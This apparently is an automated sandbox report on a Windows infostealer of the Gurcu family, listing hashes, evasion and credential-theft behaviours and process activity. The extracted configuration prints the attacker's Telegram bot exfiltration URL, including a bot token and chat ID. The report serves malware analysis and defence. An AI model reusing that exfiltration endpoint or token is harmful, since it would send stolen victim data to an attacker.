Analysis
-
max time kernel
93s -
max time network
99s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06-12-2024 15:03
Static task
static1
Behavioral task
behavioral1
Sample
7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe
Resource
win7-20240903-en
General
-
Target
7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe
-
Size
5.6MB
-
MD5
20c1c110a69ba6dc9fb55a1186334290
-
SHA1
7b35f156d8ef02936af990349d35efd7146380f2
-
SHA256
7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29
-
SHA512
08eb3ff63e09c6d236ceac3c006c844c48f283c266e8b3fa25ec1ee04d2eca49ec4788534e1ee55749de5ad89ddfa0dbbafa4eb9f30f35cdd783da08a2ad5d10
-
SSDEEP
98304:aGl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6Uc:adOuK6mn9NzgMoYkSIvUcwti7TQlvciE
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7912788699:AAGD1HW4P2288HKKYEhpShtetd37D8GqFZo/sendDocument?chat_id=7781867830&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
Signatures
-
Gurcu family
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe -
Loads dropped DLL 1 IoCs
pid Process 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 3 raw.githubusercontent.com 4 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 2000 wrote to memory of 2700 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 85 PID 2000 wrote to memory of 2700 2000 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe 85
Processes
-
C:\Users\Admin\AppData\Local\Temp\7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe"C:\Users\Admin\AppData\Local\Temp\7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29N.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpCF08.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpCF08.tmp.bat2⤵PID:2700
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
233B
MD54190f5667ae27c6abc2d38bbdf5118a0
SHA1f9199debac7879158a37323e93ad7ef60d460201
SHA256f779d5f7c162a4023e3b1d2c7bf61a4e412733ae9185173d7c4c3fca2b852660
SHA512e6a64f34e657ad7ea0f86c6ef916f22a2da65996841a0e17d0cd94bb8bf06d0f40d4071ef5c7e83056933181ab684dc159a98a3328d42378cddfc6bc88b5b344
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84